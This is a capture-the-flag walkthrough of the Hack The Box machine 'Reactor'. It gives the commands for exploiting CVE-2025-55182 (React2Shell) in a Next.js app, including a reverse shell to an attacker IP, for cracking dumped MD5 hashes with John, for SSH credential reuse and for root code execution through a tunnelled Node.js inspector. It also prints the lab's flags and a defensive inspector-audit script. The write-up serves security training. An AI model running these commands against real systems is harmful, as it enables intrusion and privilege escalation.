
Hack The Box

Reactor

Tags: HTB, Medium, Linux, Web, CVE, RCE, PrivEsc

Summary

Reactor is a Medium Linux machine running a Next.js app with React Server Components on port 3000, vulnerable to CVE-2025-55182 (React2Shell) — an unauthenticated RCE via the Flight protocol. The exploit dumps a SQLite database of MD5 password hashes; cracking engineer's hash grants SSH access. A root-owned Node.js process has the debug inspector open on 127.0.0.1:9229, which is reached through an SSH tunnel and abused for code execution as root.

Machine Information

Name     Difficulty  OS     Platform
Reactor  Medium      Linux  Hack The Box

Attack Path

  1. Nmap reveals SSH and a web service on port 3000.
  2. The app is identified as Next.js with React Server Components.
  3. CVE-2025-55182 (React2Shell) gives unauthenticated RCE.
  4. The SQLite database is dumped, exposing MD5 password hashes.
  5. engineer's hash is cracked with John.
  6. SSH access is obtained as engineer.
  7. A root Node.js inspector is found on 127.0.0.1:9229.
  8. An SSH tunnel reaches the debug port.
  9. Node.js Inspector RCE escalates to root.

Reconnaissance

Initial enumeration was performed with Nmap.

nmap -sC -sV -A -T4 10.129.11.224

[Figure: Nmap scan]

Only SSH (22) and a web service on 3000 were open. Nmap labelled port 3000 as ppp?, but the HTTP response headers gave it away:

X-Powered-By: Next.js
x-nextjs-cache: HIT
Vary: RSC, Next-Router-State-Tree, ...

The X-Powered-By: Next.js and Vary: RSC headers confirmed a Next.js app using React Server Components.

Web Enumeration

The application presented the "ReactorWatch Core Monitoring System".

This stack matched the conditions for CVE-2025-55182.

Exploitation — React2Shell (CVE-2025-55182)

React2Shell is an insecure deserialization flaw in the React Server Components Flight protocol, enabling unauthenticated RCE from a single crafted HTTP POST. The public PoC was used first in single-command mode to dump the database:

python3 react2shell-poc.py -t http://10.129.11.224:3000 \
  -c "sqlite3 /opt/reactor-app/reactor.db '.dump'"

[Figure: DB dump via React2Shell]

The dump exposed the users table:

INSERT INTO users VALUES(1,'admin','a203b22191d744a4e70ada5c101b17b8','administrator','admin@reactor.htb');
INSERT INTO users VALUES(2,'engineer','39d97110eafe2a9a68639812cd271e8e','operator','engineer@reactor.htb');

The same PoC was used with --revshell to confirm interactive execution:

python3 react2shell-poc.py -t http://10.129.11.224:3000 \
  --revshell --lhost 10.10.15.89 --lport 1337

[Figure: React2Shell reverse shell]

Initial Access

A listener received a shell as the node service user.

nc -nvlp 1337

[Figure: Reverse shell as node]

node@reactor:/opt/reactor-app$

The reactor.db was visible in the app directory, confirming the dump source.

[Figure: App directory]

Privilege Escalation

Cracking credentials

Both MD5 hashes were saved to hashes.txt and run through John offline:

john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

[Figure: John the Ripper]

engineer : reactor1

The credential was reused for SSH:

ssh engineer@10.129.11.224

[Figure: SSH as engineer]

Node.js Inspector RCE

As engineer, enumeration revealed a root Node.js process with the debug inspector listening on 127.0.0.1:9229. The inspector lets a connected client evaluate arbitrary JavaScript in the process context — and the process ran as root.
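A host-side audit for the misconfiguration behind this step, added here as an example and not part of the original writeup: it parses the output of ps -eo user,pid,args (the embedded sample is constructed, not output from the machine) and flags Node.js processes started with an inspector switch, rating a root-owned inspector as critical whatever address it binds.

```python
import re

# Constructed sample of `ps -eo user,pid,args` output (not captured from the machine).
PS_SAMPLE = """\
USER       PID COMMAND
root       812 /usr/bin/node --inspect=127.0.0.1:9229 /opt/monitor/agent.js
node      1043 node server.js
engineer  2210 /usr/bin/node --inspect-brk=0.0.0.0:9230 /home/engineer/dev.js
www-data  2418 node --inspect=9240 /var/www/api/index.js
root      2300 /usr/sbin/sshd -D
"""

# Switches that start Node with the inspector active, optionally =[host:]port.
INSPECT_FLAG = re.compile(r"--inspect(?:-brk)?(?:=(\S+))?(?=\s|$)")

def parse_ps(text):
    """Return (user, pid, args) tuples from ps output, skipping the header line."""
    rows = []
    for line in text.splitlines()[1:]:
        parts = line.split(None, 2)
        if len(parts) == 3:
            rows.append((parts[0], int(parts[1]), parts[2]))
    return rows

def inspector_bind(args):
    """Return the host:port the inspector listens on, or None if it is not enabled."""
    m = INSPECT_FLAG.search(args)
    if not m:
        return None
    # Without an explicit address Node binds to 127.0.0.1:9229; a bare number is a port.
    bind = m.group(1) or "127.0.0.1:9229"
    return bind if ":" in bind else "127.0.0.1:" + bind

def find_exposed_inspectors(ps_text):
    """Flag node processes running with the inspector, ranked by what an attacker gains."""
    findings = []
    for user, pid, args in parse_ps(ps_text):
        bind = inspector_bind(args)
        if bind is None or not args.split()[0].endswith("node"):
            continue
        # A root-owned inspector yields root code execution to anyone who can reach the
        # socket, including a local user or an SSH tunnel, whatever address it binds.
        if user == "root":
            severity = "critical"
        elif not bind.startswith(("127.0.0.1", "localhost")):
            severity = "high"  # reachable from the network without any tunnel
        else:
            severity = "medium"
        findings.append({"pid": pid, "user": user, "bind": bind, "severity": severity})
    return findings
```

Processes given --inspect through the NODE_OPTIONS environment variable will not show the switch in ps, so pair this with a listener check such as ss -ltnp for port 9229.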

An SSH local port forward exposed the restricted port:

ssh -L 9229:127.0.0.1:9229 engineer@10.129.11.224

[Figure: SSH local port forward]

A Python exploit then connected to the debug WebSocket and executed commands as root:

python3 exploit.py

[Figure: Node Inspector RCE]

[+] WebSocket URL: ws://127.0.0.1:9229/997632b8-...
[*] Executando: cat /root/root.txt
    "value": "9645e0e8db5745250b643629f42a5b97\n"

Flags

User

cat /home/engineer/user.txt

[Figure: User flag]

1fba9d6031e997f3b9ade249401ccde1

Root

cat /root/root.txt
9645e0e8db5745250b643629f42a5b97

Vulnerabilities Identified

React2Shell — RCE in React Server Components (CVE-2025-55182)

Impact: remote code execution as the node service user.

Insecure Credential Storage (unsalted MD5)

Impact: account compromise and lateral movement.

Password Reuse

Impact: a database dump became authenticated host access.

Exposed Node.js Inspector on a Root Process

Impact: privilege escalation to root via the debug protocol.

Tools Used

Key Takeaways